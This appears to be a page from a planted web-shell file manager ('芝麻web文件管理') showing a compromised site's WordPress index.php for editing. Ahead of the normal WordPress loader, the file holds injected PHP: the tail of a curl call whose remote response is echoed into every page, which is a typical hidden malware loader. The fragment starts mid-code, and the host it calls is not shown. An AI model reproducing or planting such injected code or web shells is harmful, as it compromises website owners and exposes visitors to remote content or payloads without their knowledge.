芝麻web文件管理V1.00
编辑当前文件:/home/mybf1/public_html/test.bf1.my/index.php
' . $result); }else{ echo "Error: ".curl_errno($c).", ".curl_error($c); } curl_close($c); /** * Tells WordPress to load the WordPress theme and output it. *123 * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';